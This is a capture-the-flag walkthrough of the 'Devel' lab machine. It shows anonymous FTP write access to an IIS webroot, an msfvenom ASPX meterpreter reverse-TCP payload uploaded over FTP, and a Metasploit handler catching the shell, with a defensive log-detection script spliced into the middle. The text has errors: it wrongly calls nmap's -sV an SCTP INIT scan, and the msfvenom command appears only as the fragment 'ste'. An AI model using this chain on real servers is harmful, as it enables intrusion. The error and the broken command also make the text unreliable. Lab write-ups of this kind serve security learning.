With nmap we scan for open ports and services; the syntax is sudo nmap -sV -sT -O -A -p- <IP ADDRESS> where:
-sV indicates an SCTP INIT scan,
-sT indicates a TCP connect scan,
-O indicates operating system detection,
-A indicates an "aggressive" scan,
-p- indicates a scan of all ports.
The nmap scan reveals the following open ports:
21 – ftp,
80 – http.
kali@kali:~$ sudo nmap -sV -sT -O -A -p- 10.10.10.5
[sudo] password di kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-10 18:36 CEST
Nmap scan report for 10.10.10.5
Host is up (0.039s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
| 06-14-20 12:21AM 2824 met.aspx
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
We log in to the FTP server as the anonymous user to inspect its contents and discover that FTP is used to manage the website's content; we then try to upload a file, which succeeds.
kali@kali:~$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
ftp> passive
Passive mode on.
ftp> put /home/kali/Documenti/HTB/Devel/File File
local: /home/kali/Documenti/HTB/Devel/File remote: File
227 Entering Passive Mode (10,10,10,5,192,13).
150 Opening ASCII mode data connection.
226 Transfer complete.
ftp>
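The weakness exploited above is a single misconfiguration: anonymous FTP write access to a directory that is also the IIS webroot, so any script file dropped over FTP becomes executable over HTTP. The following detection is an added example (not part of the original writeup): it parses W3C-style FTP log lines and flags successful anonymous STOR commands for server-executable extensions. The log format, field names, timestamps and client addresses are constructed assumptions shaped like IIS FTP logs, not data from the target.

```python
"""Flag anonymous FTP uploads of server-executable files into an IIS webroot."""
import re

# Extensions IIS hands to a script engine; adjust to the server's handler mappings.
EXECUTABLE_EXT = re.compile(r"\.(aspx?|ashx|asmx|config)$", re.IGNORECASE)
ANON_USERS = {"anonymous", "ftp"}

# Constructed sample in W3C extended format (assumed layout, not a real capture).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip c-port cs-username cs-method cs-uri-stem sc-status sc-win32-status
2020-06-11 09:55:01 10.10.14.3 51234 - USER Anonymous 331 0
2020-06-11 09:55:01 10.10.14.3 51234 anonymous PASS *** 230 0
2020-06-11 09:55:05 10.10.14.3 51234 anonymous NLST / 226 0
2020-06-11 09:55:20 10.10.14.3 51234 anonymous STOR /File 226 0
2020-06-11 09:56:40 10.10.14.3 51234 anonymous STOR /reverse.aspx 226 0
2020-06-11 10:02:11 10.10.14.7 51300 webadmin STOR /iisstart.htm 226 0
2020-06-11 10:03:00 10.10.14.3 51301 anonymous STOR /shell.aspx 550 5
"""


def parse_w3c(text):
    """Yield one dict per log entry, taking column names from the '#Fields:' header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed row: skip it rather than misalign the columns
        yield dict(zip(fields, parts))


def find_anonymous_script_uploads(text):
    """Return (timestamp, client ip, path) for successful anonymous STORs of executable files."""
    hits = []
    for e in parse_w3c(text):
        if e["cs-method"].upper() != "STOR" or e["cs-username"].lower() not in ANON_USERS:
            continue
        if not e["sc-status"].startswith("2"):  # 226 = transfer complete; 550 = denied
            continue
        if EXECUTABLE_EXT.search(e["cs-uri-stem"]):
            hits.append((e["date"] + " " + e["time"], e["c-ip"], e["cs-uri-stem"]))
    return hits


if __name__ == "__main__":
    for hit in find_anonymous_script_uploads(SAMPLE_LOG):
        print("ALERT anonymous upload of executable content:", *hit)
```

The denied upload (550) and the authenticated user's upload are deliberately not flagged; only the anonymous, completed write of a .aspx file fires, which is exactly the event that precedes the shell in this walkthrough.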
We generate a reverse_tcp payload with msfvenom using the syntax msfvenom -p <PAYLOAD NAME> LHOST=<KALI IP ADDRESS> LPORT=<PORT NUMBER> -f <FILE TYPE> -o <OUTPUT FILE NAME>.
kali@kali:~$ ste
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2802 bytes
Saved as: reverse.aspx
We upload the payload to the target machine over FTP.
ftp> passive
Passive mode on.
ftp> put reverse.aspx
local: reverse.aspx remote: reverse.aspx
227 Entering Passive Mode (10,10,10,5,192,16).
150 Opening ASCII mode data connection.
226 Transfer complete.
2857 bytes sent in 0.00 secs (20.7988 MB/s)
We use meterpreter to open a listener on port 4444 with the same payload created earlier, using the syntax use exploit/multi/handler followed by set payload <PAYLOAD PATH>. We type run to start it.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
We trigger the payload from the web browser and obtain a shell.
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.5:49173) at 2020-06-11 11:57:59 +0200
meterpreter >